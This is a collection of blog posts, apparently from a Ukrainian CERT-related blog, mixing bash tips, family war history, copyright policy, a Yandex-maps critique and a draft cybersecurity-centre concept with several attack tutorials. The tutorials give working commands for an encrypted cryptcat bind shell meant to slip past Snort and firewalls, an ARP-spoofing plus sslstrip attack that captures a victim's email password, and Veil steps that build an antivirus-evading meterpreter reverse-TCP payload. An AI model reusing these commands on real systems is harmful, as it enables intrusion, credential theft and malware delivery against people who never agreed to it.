BASH work with text
cert_ua
1. Remove empty strings from file:

cat something.txt | sed '/^$/d'

2. Select only ip addresses from file:

grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" some-text-with-IPs.txt

Апдейт по в\ч прадеда (648 аап ргк или 110 гап)
cert_ua
Ранее я писал о моих попытках найти про моего воевавшего прадеда и его подразделение, информацию.

Я нашёл и рассказал в трёх постах (1, 2 и 3) про его награды и славный боевой путь, а заодно испробовал современные источники информации на эту тему.

Вот новое обновление:

В марте 2013 года РПЦ освятила боевое знамя недавно передислоцированной в п. Тоцкое-2 Оренбургской области. Об этом подробно написано тут.


Историческая справка по вч 32755 (так теперь в РФ называется ) такова:

История воинской части 32755 берет свое начало 23 июня 1941 года. Спустя месяц – 23 июня 1941 года артиллеристы приняли первый бой севернее Кишинева, долгое время не давая противнику переправиться через Днестр. В начальном периоде Великой Отечественной войны офицеры и солдаты части пережили отступление и тяжелейшие оборонительные бои под Николаевом, Донецком, Харьковом, Ростовом. За годы войны полк и бригада прошли 8,3 тысячи километров, артиллеристы произвели около 85 тысяч выстрелов по противнику. Из 1418 дней войны только 54 дня часть была в резерве, еще около ста – на формировании или в резерве фронта, а остальные дни – в боях в составе войск 9-ой, 12-ой, 37-ой, 38-ой, 66-ой, 21-ой, 2-ой гвардейской, 44-ой, 28-ой, 3-ей гвардейской и 5-ой ударной армий.
Батареи части участвовали в знаменитой артподготовке 19 ноября 1942 года, возвестившей начало операции по окружению войск фельдмаршала Паулюса. «За участие в героической обороне Сталинграда» личный состав 648-го армейского артполка РГК награжден медалью «За оборону Сталинграда» (указ Президиума Верховного Совета СССР от 22.12.1942).
За отличия в боях с немецкими захватчиками в Сталинградской битве 648-ый аап РГК преобразован в 110-й гвардейский армейский пушечный артиллерийский полк РГК (приказ НКО СССР от 01.03.1943 № 102).
10 мая 1943 года из Москвы доставлено гвардейское знамя и приказ № 102 НКО от 1 марта 1943 года – за мужество и героизм, проявленный в боях за г. Сталинград, бригаде присвоено звание «Гвардейская».
10 апреля 1944 года за мужество, храбрость и отвагу, проявленные при освобождении г. Одессы, бригаде присвоено почетное наименование «Одесская».
За участие в освобождении Варшавы личный состав бригады награжден медалью «За освобождение Варшавы».
19 февраля 1945 года за образцовое выполнение заданий командования в боях по овладению городов: Сохачева, Скерневицы, Ловига и проявленные при этом доблесть и мужество бригада награждена орденом «Красного Знамени».
28 мая 1945 года за проявленное мужество, отвагу и героизм при взятии Берлина бригада награждена орденом Богдана Хмельницкого II степени.
За участие в героическом штурме и взятии Берлина личный состав бригады награжден медалью «За взятие Берлина».
Места дислокации: 1945-1994 годы – в составе Советских войск в Германии; 1994-1999 годы – п. Тоцкий Оренбургской области; 1999-2001 год – г. Пермь; 2001-2012 г – п. Звездный Пермского края. С 2012 года – п. Тоцкий Оренбургской области

Лично мне интересна судьба боевого знамени кумачёвого цвета, что на фото этого репортажа (если конечно это оригинал). Эдакий артефакт)


Так же знаю что обновился движок сайта http://podvignaroda.ru и теперь наградной листок прадеда выглядит примерно так:

http://podvignaroda.ru/?#id=17044374&tab=navDetailDocument

True криптография
cert_ua
Прикольная на мой взгляд утилитка, входящая в состав BackTrack и Kali Linux - cryptcat. Она не только умет создавать соединение между двумя ПК на любом порту (как это делает netcat), но и шифрует это соединение алгоритмом twofish (алгоритм разработки Bruce Schneier'а).

Шифрование сессии [почти идеально] скрывает от систем выявления вторжений информационный обмен, даже если он происходит через обычные порты 80 и 443.

Поехали /взмахнул ногой

1. Качаем cryptcat под винду отсюда.
2. Открываем слушающий сокет (listener) в винде на порту, скажем, 9119, после чего запускаем командный интерпретатор (shell):

cryptcat -l -p 9119 -e cmd.exe

3. Запустим Snort в качестве этого Вашего IDS на машине с Linux чтобы слушать траф и услышать, если он будет  подозрительным в процессе взаимодействия

snort -dev -c /etc/snort/snort.conf

4. Коннектимся с помощью cryptcat к винде

cryptcat 192.168.0.199 9119

Если всё ок - должно появиться приглашение шелла винды. Дальше дело за расширением полномочий. Так как пересылка шелла через сеть - атака, то проверим что отловил snort своими правилами. По идее, в случае незашифрованной передачи cmd.exe стриггерится соответствующая сигнатура. Но мы не увидим ничего подозрительного в логах снорта - /var/snort/alerts


5. Пересылка cryptcat через 80 порт и обход фаерволла

Ладно, криптованное соединение создано, но оно использует заметный для внимательного админа порт 9119, который он заблочит руками, либо ногами фаерволом.

Для общения через интернеты необходимы порты 80 и 443, а опционально - 25, 53 и 110. Но порт 80 открыт всюдуц и везде, его и используем для создания шифрованного соединения, как наиболее незаметный и широко используемый.

Итак, на машине-жертве под виндой создам очень-важный-документ.txt, который отошлю (вместо шелла винды как в прошлый раз) в зашифрованном виде.

cryptcat -l p 80 < очень-важный-документ.txt

Теперь приконнекчусь к жертвенной винде, указав айпи и порт, на котором она слушает:

cryptcat 192.168.0.199 80

Проверка логов снорта порадует стабильностью отсутствия каких-либо событий безопасности. Ну и хорошо.

Так-то.

Перехват данных из SSL-соединения (читаем почту юзеров локалки через https)
cert_ua
Покажу и расскажу как с помощью утилиты sslstrip перехватить данные которые передаются по защищенному SSL-соединению.
Утилитка sslstrip в моем примере (после проведения атаки типа ARP-spoofing на жертву) перехватит запрос веб-клиента жертвы на установление защищенного SSL-соединения и заставит его использовать незащищенныый протокол HTTP. Далее я просто подсмотрю то, что делает жертва, не обратившая внимание на то, что она читает почту не по HTTPS, а по HTTP.

Вы убедитесь в том как просто можно организовать атаки типа MITM на SSL путем техник arp-spoof и проги sslstrip.

Поехали.

В моем примере жертва - виртуалка с ИПом 10.10.11.163 (обычная тачка с виндой), ПК с которого я атакую - 10.10.11.85 с установленной ОС Kali и с sslstrip (эта утилита предустановлена в пентестерских дистрибутивах Kali\BackTrack Linux). Между нами шлюз с ИПом 10.10.11.1.

1. При заходе жертвы на gmail.com ее кидает на адрес https://gmail.com и это нормально. Естественно, пароли и логины к почте жертвы мы в открытом виде не видим.

2. Включаю маршрутизацию трафика на ПК с Кали:

echo "1" > /proc/sys/net/ipv4/ip_forward

и настраиваю iptables таким образом, чтобы весь http-трафик направлялся на порт 81:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 81

теперь заставлю жертву считать, что моя тачка - это шлюз (проведу атаку ARP-spoofing) с помощью команды

arpspoof -i eth0 -t 10.10.11.163 10.10.11.1

теперь трафик жертвы ходит через мою тачку и (согласно моего правила iptables) форвардится на 81 порт.

3. Запускаю sslstrip

sslstrip -a -l 81 -w /root/Desktop/ssllog.txt

это создаст файлик лога прямо на рабочем столе и начнет писать в него перехваченный http-трафик (собственно, перехватываться-то будет HTTPS, но он будет strip'аться). Ну вобщем, запускаю на консоли смотрение этого файлика:

tail -f /root/Desktop/ssllog.txt

4. Жертва идет на свою почту

Для чтения почты жертва как всегда лезет в MS Explorer (хехе) и вводит там gmail.com. Но браузер почему-то не перекидывает жертву на https (в адресной строке http)! На рисунке ниже изображено то что увидит жертва в последний миг перед тем, как я узнаю ее пароль и логин.



Жертва жмакает "Войти"...а на моем окошке, куда выводился перехваченный трафик я вижу следующее:



Как видно, пароль 1q2w3e4r5t6y...

Чтобы избежать угроз, связанных с перехватом начала SSL-соединения, надо:
- не юзать гаджеты в недоверенных сетях, даже если это очень надо (злодей может устроить MITM с гораздо бОльшей вероятностью, скажем, в аэропорту путем установки rogue wireless access point, чем ломанув корпоративную сеть вашей организации);
- шифровать почту симметричными протоколами шифрования (пишу и думаю о PGP);
- платить нормальную зарплату админу чтоб у него не возникало желания шпионить за вашими сотрудниками таким образом;
- следить за ARP-таблицей и юзать оборудование/софт, которое отслеживает подбные атаки;
- регулярно обновлять ПО из доверенных легальных источников.


Помните, что статья иллюстрирует то, что запрещено законом и примеры в ней приводятся с целью показать простоту организации атак на SSL в исключительно образовательных целях.

как найти IP сайта на cloudflare
cert_ua
Поиск айпи-адреса обычно упрощается за счет плохо настроенных админами сервисов, но я опишу пару эффективных способов.

Эта задача часто нужна с целью локализации и устранения угроз, исходящих от вредоносных сайтов, использующих cloudflare в качестве противоабузного и противо-DDoS сервиса. Сервис cloudflare скрывает айпи-адрес такого сайта, потому сложно адрессовать абузу (жалобу) или устроить ДДоС-атаку на этот сайт.

Конечно,  ДДоСить неугодный Вам сайт на cloudflare - это незаконно.

метод 1: брутфорс субдоменов

пинганите домен - это даст неправильный айпи сайта. дальше пинганите домены:

direct-connect.<домен.ком>

direct.<домен.ком>

ftp.<домен.ком>

cpanel.<домен.ком>

mail.<домен.ком>

метод 2: используйте netcraft toolbar

Для доменов с длительным временем жизни, введя в браузер что-то типа

http://toolbar.netcraft.com/site_report?url=домен.ком

метод 3: брутфорс доменов

При брутфорсе субдоменов некоторые субдомены могут иметь реальные айпи.
Для этого можно использовать nmap

nmap -sV -sS -F домен.ком

, что даст понимание испоьзуется ли cloudflare или нет.

Далее стартуем сам брутфорс:

nmap --script dns-brute -sn
домен.ком


метод 4: скрипт на баше

Идем сюда, качаем, делаем запускаемым и скрипт тестирует все вышеперечисленные методы))

Авторське право на Україні
cert_ua
333

Україна — одна з країн, де авторське право порушується постійно та у великих масштабах. Прикладом того, що Україна є розповсюдницею піратства та є піратом №1 у світі є потрапляння України у “Спеціальний звіт 301”, який щорічно готується Офісом торгового представника США (USTR). Про це ж у своєму звіті інформує Уряд США і Міжнародний альянс інтелектуальної власності (IIPA). Не зважаючи на складне політичне становище дії Уряду України недостатні і визивають розчарування у авторів звіту, бо темпи реформ направлених на боротьбу з явищами, які привели Україну до визнанння США країною піратом 1 у світі повільні. Протягом декількох останніх років головні претензії США стосувалися трьох критичних проблем у сфері прав інтелектуальної власності в Україні — це відсутність:



1) Ефективних і системних засобів боротьби з порушенням авторського права і суміжних прав в Інтернеті;

2) Несправедливого, непрозорого адміністрування системи збору авторської винагороди;

3) Механізмів впровадження ліцензійного програмного забезпечення урядовими установами України.

Завдяки потраплянню у цей звіт Україна понесла колосальні репутаційні і фінансові збитки. Відновлення репутації — тривалий та складний процес, а щорічні прямі фінансові збитки дорівнюють приблизно 160 млн. доларів США на рік тільки на втратах преференцій по миту. Непрямі ж збитки України, наприклад, не зроблені інвестиції в інтелектуальну сферу, ще більші. В деяких країнах вкладення в інтелектуальну сферу перевищують вкладення в інші сфери (економіка, промисловість т.і.), тому ми втрачаємо дійсно колосальні активи.

З досліджень IIPA цього року випливає, що основні претензіі у звіті стосуються економічних інтересів правовласників США, тобто наголос на їхні збитки. Але зважаючи на те, що політика і практика України щодо функціонування інституту права інтелектуальної власності залишається неідеальною, торговий представник визначив, що на даний час, політична ситуація в Україні змушує не застосовувати ніяких дій і цінує ті взаємини, які складаються останнім часом з урядом України, які направлені на постійну взаємодію у вивченні як поліпшити виявлені проблеми і загальний режим застосування інтелектуальної власності.

В 2015 році IIPA вважає пріоритетом для уряду України правові реформи і рекомендує наступні дії:


  • поліпшити правове регулювання організацій з колективного управління;


  • застосувати кримінальну відповідальність та судове переслідування власників сайтів, які розміщують на безоплатній основі кіно, книги, музику, ПЗ тощо, а також розібратися з власниками BitTorrent.


  • ввести у дію принципи, які б унеможливили використання ліцензій без дозволу правовласників.


Також у звіті йдеться про наявність в Україні організованих злочинних синдикатів і пропонується активно з ними боротися.

Щодо правових реформ, то IIPA пропонує спрямовання їх на:

- зміни до закону про авторське право, закону про телекомунікації та Кодексу про адміністративні правопорушення, з метою сприяння ефективному реагуванню боротьби з інтернет-піратством, в тому числі:

1) забезпечення правових стимулів для провайдерів, які співпрацюють з правовласниками і ефективно боряться з інтернет-піратством;

2) визначитися з переліком послуг, які сприяють порушенню авторського права і суміжних прав або які полегшують таке порушення;

3) забезпечити судову заборону порушень в Інтернет, ввести мито для провайдерів та зобовязати їх надавати інформацію в правоохоронні органи і правовласникам.

У жовтні 2014 року, міжнародні експерти в області інтелектуальної власності підготували деякі пропозиції до змін у законопроекті Державної служби по боротьбі з порушеннями в Інтернет, щоб належним чином вирішити вищенаведені проблеми. ЇХ треба негайно прийняти. А також забезпечити:· прийняття Закону про колективне управління, в якому би містилися вимоги сформульовані у звіті IIPA за 2015 Special 301: Україна та відповідали б статті 168-ЄС Угоди України про Асоціацію з ЄС (доречі, тут авторському праву присвячено цілий розділ 3) щодо двосторонніх угод з іноземними організаціями та вимогою працювати прозоро і ефективно;

- зміни до закону про авторське право і Кримінальний кодекс, для того щоб зробити camcording в кінотеатрах незаконною діяльностю, а також зміни до закону про кінематографію щодро місцевого виробництва фільмокопій;

- кримінально-виконавчі дії, в тому числі судові переслідування за порушення в цілому на відкритих ринках, вулицях і недалеко від місцевих магазинів і супермаркетів.

- адміністративні та митні норми права, які б були орієнтовані проти copyrightinfringing кабельного мовлення і ретрансляцію публічного сповіщення на радіо і ТБ. Полсилення прикордонного контролю, особливо вздовж кордону з Росією тощо.

У звіті перераховані всі популярні піратські сайти, які працюють в Україні,це: EX.ua (правда, у звіті згадується, що в 2014 році сайт спілкувався з правовласниками і видаляв контент з порушеннями); extratorrent.cc; sumotorrent.sx; futubox (хоститься в Румунії, але управляється з України); newalbumreleases.com (хоститься в Україні); jams.to (хоститься в Україні).

У звіті згадується, що хостинг надається сотням піратських сайтів і торрентів, таким як torrentbit.net, btloft.com, bitloft.org, torrentz.cd, torrentpond.com, btmon.com, torrentz.wf та ін.

Дослідники Альянсу обурюються, що в 2014 році жодна кримінальна санкція не була застосована в Україні у справах про інтернет-піратство (відповідно до користувачів, адміністраторів або власників сайтів). Також згадуються локальна мережа (LAN) за межами Києва, де на FTP на високій швидкості можна знайти і скачати масу контенту, з порушенням права правовласників.

CERT-UA розуміє, що права авторів треба поважати. Ми намагаємось використовувати тільки ліцензійне програмне забезпечення і пропонуємо робити це всім іншим. Сподіваємось, що невдовзі будуть прийняті необхідні нормативні зміни. У перспективі командою CERT-UA планується налагодити можливість реагування на інциденти щодо порушення авторського права. Ми розуміємо, що великою мірою до піратства Україна вимушена внаслідок відсутності бачення альтернативи при використанні програмних виробів open source у державному секторі. З метою допомоги владним структурам нами планується налагодити веб-хостинг та електронну пошту для державних потреб, про що повідомлялось у ЗМІ.


СЕРТ-UA готується розглядати у подальшому хостинг противоправного контенту у якості кіберинциденту і реагувати на
нього в рамках законодавства після його появи. Планується, також, консультувати за погодженням відповідального за це
міністерства правовласників та громадськість про авторське право та, наприклад, як краще зібрати докази для
судового блокування контенту, що порушує авторське право.



Про проблеми з авторським правом CERT-UA знає й на власному досвіді — ми подали заяву на отримання свідоцтва про реєстрацію торгової марки CERT-UA вже рік тому. Цей процес (якщо його не «прискорювати») на Україні зазвичай займає близька півтора роки. А поки що якось так:
332

Обход антивируса, как написать сэмпл, НЕ делиться им с антивирусами и о скорости реакции антивирусов
cert_ua




Есть такая утилита в пакете Kali Linux как Veil, которая позволяет:


  • обходить установленную антивирусную защиту


  • скачивать и устанавливать пейлоады из Metasploit framework и из предстоящих версий Metasploit


  • пытаться создать пейлоад максимально случайным и трунораспознаваемым


Последняя текущая версия Veil — 2.3.14. С недавних пор (v. 2.0.4) Veil стал поддерживать архитектуры x86 и x64 и получил возможность обновления. Мануалы лежат тут - http://www.veil-evasion.com а фреймворк можно скачать с github - https://github.com/ChrisTruncer/Veil/ или отсюда https://github.com/ChrisTruncer/Veil/archive/master.zip. Важно отметить, что разработчики Veil не хотят поддерживать возможность загрузки пейлоадов на www.virustotal.com чтобы не помогать разработчикам антивирусов. Есть альтернатива этого ресурса — vscan.novirusthanks.org, который сканирует подозрительные файлы на предмет вредоносного ПО и предлагает опцию “не предоставлять сэмпл” (Do not distribute the sample).

Установка Veil под Kali Linux:

apt-get update

apt-get install veil

Покажу как обходить антивирусную защиту нескольких известных производителей.

По умолчанию после установки Veil имеет 35 готовых пейлоадов, использую их командой use:

антивирусная эпопея_html_94866445



После этого veil даст больше информации о пейлоадах. Я выбрал python/shellcode_inject/base64_substitution набрав 29

антивирусная эпопея_html_838ff6dc



Когда мой пейлоад загружен, пишу "generate". Тут можно использовать некоторые специфические опции, но в примере используем опции по умолчанию (да, я знаю что это плохо).

антивирусная эпопея_html_4302123c



Теперь используем msfvenom нажав “1”

антивирусная эпопея_html_cd43a078



После этого нам необходимо ввести некоторые дополнительные данные:


  • вводим название пейлоада из metasploit: "windows/meterpreter/reverse_tcp"


  • вводим значение 'LHOST', [tab] for local IP: "10.10.11.63"


  • вводим значение 'LPORT': "443"


антивирусная эпопея_html_7cbb94ac



Теперь необходимо подождать пока сгенерируется шеллкод.

Надо нажать энтер и Veil запросит имя пейлоада. В нашем случае имя будет "undetectable_sh1t"

антивирусная эпопея_html_c090b697



Использую Pyinstaller для создания исполняемого файла с расширением .exe. Для этого наберём “1”.

антивирусная эпопея_html_fbfa7ca8



После этого можно забрать ехе-шник из "/root/veil-output/compiled/"

К сожалению, мой veil на последней стадии ругнулся на отсутствие питона, после чего вышел вон:

антивирусная эпопея_html_b20f0bd2



Эти строки я загуглю потом 8)

[!] ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/

[!] ERROR: Make sure the python.exe binary exists before using PyInstaller.

чтобы было понятно, скажу что питон надо для того чтоб скомпилировать мой пейлоад тем компилятором и в той операцинной системе, где планируется его дальнейший подрыв (запуск). В моем случае veil попытался поднять питон в эмуляторе Windows — wine и это ему не удалось. Я зашел в папку /root/.wine/drive_c/Python27 но питоновского ехе-шника там не нашел. Тут можно было бы разбираться разными способами, но я подумал что питон — не родной компилятор для виндовс-систем и гораздо ближе и роднее компилятор си (было поздно и хотелось дойти до конца этой статьи еще сегодня).

Кстати, тем кто не любит интерактивных интерфейсов, скажу что все эти действия можно было сделать примерно такой командой:


Veil.py -l python -p python/shellcode_inject/base64_substitution -o undetectable_sh1t --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=10.10.11.63 LPORT=443




Я вернулся командой back в изначальное меню выбора пейлоадов и выбрал пункт 6 (c/meterpreter/rev_tcp_service). Далее по аналогии с предыдущим примером задал командой

set LHOST 10.10.11.63

необходимые переменные, после чего дал команду generate.

антивирусная эпопея_html_7dab2645



Этот пейлоад я назвал по-другому

антивирусная эпопея_html_735dd56c


Выдалось долгожданное сообщение об успехе компиляции пейлоада:

антивирусная эпопея_html_359faf11


Теперь у нас есть исполняемый файл, для которого мы посчитаем md5-сумму (это как отпечатки пальцев)

антивирусная эпопея_html_3b836a1a


 которую (8437b8261c85369a700456704fd7ed85) мы скормим сайту novirusthanks.org, а именно — сервису Monitor Malicious Executable URLs.

антивирусная эпопея_html_bd374f05

Сайт кушает URL, ссылки, адреса и md5-суммы (надо выбрать вверху Search Database)

антивирусная эпопея_html_de3b8f85



Загрузим нашу сумму в окошко для мд5-сумм чтоб потестировать его реальную невидимость для антивирусных образцов. Жму кнопочку Search...

антивирусная эпопея_html_a07beb13


...и в базе нет такой суммы

антивирусная эпопея_html_3fb13d13


Кстати, есть еще аналогичный анонимный и без расшаривания самплов ресурс. Его легко найти как показано на скрине ниже. Работает или нет — не проверял, но пишут что есть 4 ежедневные бесплатные проверки 33 движками антивирусов и БЕЗ предоставления сэмпла третьим лицам.

антивирусная эпопея_html_2bdd177f


Теперь проверим скорость реакции антивирусов на новый сэмпл))) ведь сравнением именно этой скорости проще всего сравнить антивирусы. Для этого просто скормлю свой сэмпл вирустоталу (не жалко) и посмотрю отчет сразу и через некоторое время.

антивирусная эпопея_html_bf21a08e





Тоесть на момент компиляции сэмпла 14 из 57 антивирусов отдетектили новый вредонос.

хм...через 15 часов результат тот же. Через сутки - то же самое:

Снимок экрана от 2015-03-04 19:50:22

Выходит, что реакция антивирусов на новый сэмпл который выложен на вирустотале - больше суток.

апдейт через НЕДЕЛЮ (10.03.2015) дал следующий результат

Снимок экрана от 2015-03-10 11:44:30
Снимок экрана от 2015-03-10 12:45:32

Короче, даже недели времени некоторым антивирусам мало, чтобы проработать и эффективно выявлять новый сэмпл. Даже мой, простой сэмпл через неделю распознают примерно половина антивирусов, судя по данным вирустотала.

так-то.

Yandex считает Крым Российской Федерацией, но не для посетителей Украины
cert_ua


  Сервис интерактивных карт российской компании Yandex, согласно их же пользовательскому соглашению, предлагает Пользователю возможность бесплатного доступа к актуальной картографической и иной справочной информации. Точность для этого сервиса — принципиальный вопрос, согласитесь.

Для посетителей из украинского сегмента сети Интернет сервис карт российской компании Yandex границы Украины выглядят так:

1

Обратите внимание на то, что полуостров Крым по данным Yandex-карт принадлежит Украине. Но это только для посетителей, зашедших на этот ресурс с украинских айпи-адресов. Для того, чтобы проверить принадлежность полуострова Крым для посетителей из других стран, воспользуемся технологией Tor. Клиент тор-сети (в нашем случае — это Tor Browser) позволяет относительно анонимно и через прокси-серверы со всего мира выходить в глобальные сети. Воспользовавшись тор-браузером, мы проверим наш айпи-адрес, зайдя на один из сайтов для его проверки:

1


Теперь мы как бы посетитель из Швейцарии, с операционной системой Windows 7 и наш браузер — Firefox. Проверим, что думает о границах Украины сервис Яндекс-карт:

1
Если немного увеличить карту, получим информацию о том, какие города и местности теперь приграничные по мнению сервиса Yandex-карты:



1

Не зря эти карты называют политическими, ведь штаб-квартира Yandex находится в Российской Федерации...а, ведь кто-то по этим картам логистику планирует, туризмом и бизнесом занимается.

Интересно, что аналогичный сервис от компании Google приводит другую информацию о государственных границах Украины, обозначая границу между континентальной Украиной (Херсонской областью) и полуостровом Крым штриховой линией:


1При этом в пользовательском соглашении компании Яндекс есть интересный, на мой взгляд, пункт 4: Государственная граница между Российской Федерацией и республикой Абхазия, Грузией, республикой Южная Осетия, Эстонской республикой подлежит международно-правовому оформлению.

Поскольку эта государственная граница не оформлена нигде, кроме карт Яндекса, считаем возможным компании использовать своё соглашение и «без предупреждения и по своему усмотрению удалить любой Пользовательский объект или набор Пользовательских объектов в случае, если содержащаяся в его описании информация противоречит законодательству РФ...», либо хотя бы дополнить вышеуказанный пункт 4.

Предлагаю пользователям сети Интернет выбирать только качественные и надёжные сервисы.

...и что-то там на посягания на териториальную целостность...


Концепція Національного центру кібернетичної безпеки України [draft] aka А что если вот так?
cert_ua

  1. Основні положення


На порядку денному України постали завдання переходу до нового етапу розвитку суспільства, наступного за постіндустріальним – етапу Інформаційного суспільства, головним змістом якого є діяльність людей, що пов’язана з отриманням, обробкою та створенням інформації. Сучасний стан захищеності інформаційних систем об'єктів критичної інфраструктурикритичної інформаційної інфраструктури, як її підмножини) на сьогодні є не задовільним для України. Внаслідок сильної зв'язності інформаційного  суспільства стан захисту об'єктів критичної інфраструктури України прямо та опосередковано впливає на інші країни і все більше впливає на імідж України в світовому інформаційному просторі.
Найбільш актуальними для України на сьогодні є наступні загрози:

  • можливість ураження інформаційних систем об’єктів критичної інфраструктури (у сфері енергетики, телекомунікацій, фінансово-банківського сектора, транспорту та оборони);

  • високий рівень кіберзлочинності, що має транснаціональний характер;

  • діяльність іноземних спецслужб та розвідувальних служб інших країн, хакерських угруповань;

  • поширення негативного іміджу України, що обумовлюється низьким рівнем соціально-економічного розвитку, корумпованістю та недієвістю органів державної влади, складною криміногенною ситуацією та незадовільним для українців рівнем надання соціальних сервісів українським державним апаратом;

  • вкрай низька ефективність правоохоронних органів, силових відомств, державних органів при протидії комп’ютерним атакам (кіберагресії);

  • не ефективна та не гнучка система управління національним сегментом мережі Інтернет, доменним простором .ua та .УКР;

  • не прозора та не дієва схема взаємодії держави і громадян у питаннях кібербезпеки.

Відповідно до законодавства питання протидії зовнішнім та внутрішнім кіберзагрозам в Україні належать до компетенції Адміністрації Державної служби спеціального зв’язку та захисту інформації України, Служби безпеки України, Міністерства внутрішніх справ України. До зазначеної діяльності також залучаються Міністерство оборони України та інші центральні органи виконавчої влади.
На виконання статті 35 Конвенції про кіберзлочинність у Міністерстві внутрішніх справ України функціонує Національний контактний пункт формату 24/7 щодо реагування та обміну терміновою інформацією про вчинені комп’ютерні злочини. У складі Державної служби спеціального зв’язку та захисту інформації України утворено Центр реагування на комп’ютерні інциденти, який пройшов акредитацію у міжнародних інституціях (CERT-UA).
В рамках Спільної робочої групи Україна-НАТО з питань воєнної реформи високого рівня діє робоча підгрупа з питань кіберзахисту.
Проте, фактичний стан захищеності України в інформаційному плані не дозволяє ефективно захищати, розвивати її телекомунікаційну складову, що вкрай негативно впливає на внутрішню та зовнішню політику України, уповільнює економічний та соціальний розвиток.
З огляду на зазначене українське керівництво повинно вжити комплекс заходів для мінімізації негативних чинників з метою забезпечення належного рівня інформаційної безпеки суспільства і держави. Їх можливо поділити на три складові: організаційні, нормативно-правові та технічні.
З метою реалізації цих заходів в Україні створюється система кібернетичної безпеки, завдання, функції та організаційну структуру якої, а також основні завдання суб’єктів системи кібернетичної безпеки України наведено у додатках.
Основні суб’єкти кібернетичної безпеки:

  • РНБО України;

  • Верховна Рада України;

  • судові та правоохоронні органи;

  • міністерства та інші органи державної влади;

  • спеціальні служби (органи), на які покладено завдання з забезпечення інформаційної безпеки держави;

  • органи місцевого самоврядування, неурядові організації, приватні підприємства, громадяни.


Досвід України у державному управлінні з питань кібербезпеки, який полягав у покладанні певних вузькоспеціалізованих завдань на певні міністерства, не виправдовує себе. Про це свідчать аналітичні дані, наведені у додатку 1.
Тому, для забезпечення координації діяльності суб’єктів кібернетичної безпеки, враховуючи власний досвід України та сучасні кращі закордонні практики, найближчим часом необхідне створення Національного центру кібернетичної безпеки, до складу якого увійдуть:

  1. Оперативна рада (група) кібербезпеки – створена відповідно до наказу Адміністрації Держспецв’язку, повинна включати адміністративні контакти (керівників ключових підрозділів держави і приватного секторів, зокрема операторів/провайдерів ринку телекомунікацій), мати дорадчий та консультативний статус, брати участь у організації важливих для держави подій в частині що стосується;

  2. Центр боротьби з кіберзлочинністю та розслідувань – створений на базі Держспецзв’язку, повинен включати співробітників УБК МВС України, ДКЗІДСІБ СБ України, МО України та СЗР України. Центр з боротьби з кіберзлочинністю та розслідувань мати права суб’єкту регулювання ринку телекомунікацій, правоохоронного органу та криміналістичної лабораторії з комп’ютерної тематики:

    1. право на досудове блокування інформаційних ресурсів з наступних причин: екстремізм, тероризм, розпалювання міжнаціональної та міжконфесійної ворожнечі і масові заворушення, дитяча порнографія тощо;

    2. право визначення підслідності, відкриття і закриття кримінального провадження, слідчі дії, робота з НКП;

    3. криміналістичних експертиз (право залучати експертів).


Співробітники Центру з боротьби з кіберзлочинністю та розслідувань повинні бути штатними співробітниками правоохоронних органів, у компетенції яких лежить боротьба з кіберзагрозами. У межах Центру з боротьби з кіберзлочинністю та розслідувань вони виконують свої прямі завдання та користуються правовим полем цих міністерств, координуючи свою діяльність за допомогою Оперативної ради (групи) кібербезпеки та за допомогою підрозділу з визначення підслідності.

  1. Центр моніторингу та технічного супроводження системи захисту державних інформаційних ресурсів у складі:


  • відділ антивірусного захисту інформації – антивірусний захист держави, вивчення та розробка нових зразків ШПЗ;

  • відділ CERT-UA – реагування на інциденти інформаційної безпеки, досудове вирішення спорів, надання допомоги громадянам, міжнародна діяльність;

  • відділ аудиту інформаційної безпеки та оцінок стану захищеності – права інспектування, оцінок стану захищеності ДІР в ІТС ОДВ, право накладання штрафу за адмінпорушення у сфері захисту інформації і подання заявок до Центру з боротьби з кіберзлочинністю та розслідувань (пп. 2.1-2.3);

  • відділ стандартів та внутрішнього контролю – експертизи ТЗІ та КЗІ, розробка та впровадження стандартів з ІБ для потреб суб’єктів кібернетичної безпеки, аналітична робота з питань кібербезпеки, контроль ефективності роботи з основних завдань Національного центру кібернетичної безпеки, винесення пропозицій на розгляд Оперативної ради (групи) кібербезпеки;

  • відділ технічних засобів та МТЗ – закупівля МТЗ та техніки, ведення господарської діяльності, тестування нових розробок у галузі телекомунікацій тощо;

  • відділ технічного супроводження системи захисту державних інформаційних ресурсів – адміністрування СЗДІ, надання телекомунікаційних сервісів та сервісів з кіберзахисту від імені Національного центру кібернетичної безпеки для суб’єктів кібернетичної безпеки, контроль номерного ресурсу державного сектору України, забезпечення програмним забезпеченням потреб Національного центру кібернетичної безпеки та суб’єктів кібернетичної безпеки;


  1. Центр протидії кіберагресії у складі:


  • відділ з протидії кібератакам – представники МО України, СБ України, МВС України. Права перехвату у операторів і провайдерів контролю граничних для Українського сегменту мережі Інтернет активних мережевих пристроїв при кіберагресії проти України, взаємодія з операторами/провайдерами стосовно надання і призупинення надання телекомунікаційних послуг у досудовому порядку;

  • група силового втручання – забезпечення виконання правоохоронних функцій, забезпечення заходів з кримінального провадження, слідчих дій – виконують свої прямі завдання та користуються правовим полем силових відомств, координуючи свою діяльність за допомогою Оперативної ради (групи) кібербезпеки та за допомогою підрозділу з визначення підслідності. На першому етапі пропонується позаштатно формувати з представників спецпідрозділів силових структур (МВС України, СБ України, тощо);

  • відділ взаємодії з ЗМІ – публікації новин, ведення інформаційних ресурсів, взаємодія зі ЗМІ (позиціонування діяльності Національного центру кібернетичної безпеки у інформаційному просторі, соціальних мережах тощо), взаємодія з недержавними і громадськими організаціями;

  • відділ протидії технічним розвідкам – забезпечення захисту Національного центру кібернетичної безпеки від негативного впливу спецслужб інших країн (ПЕМВ, пошук та знешкодження закладних пристроїв, участь у криміналістичних експертизах у якості експертів тощо). Пропонується комплектувати з профільних підрозділів Держспецзв’язку та СЗР України, оперативних підрозділів СБ України;

Крім того, у склад Національного центру кібернетичної безпеки повинні входити підрозділи загального призначення:

  • відділ юридичного обслуговування - загальноюридичні та спеціальні юридичні послуги, розробка нової нормативної бази, супроводження її при юстуванні, впровадження нових стандартів спільно з відділом стандартів та внутрішнього контролю, оформлення необхідної документації для судового розгляду кримінального провадження, супроводження справ у судах;

  • відділ бухгалтерського обслуговування;

  • відділ РСС;

  • мобілізаційний підрозділ;

  • відділ внутрішньої безпеки та аудиту.

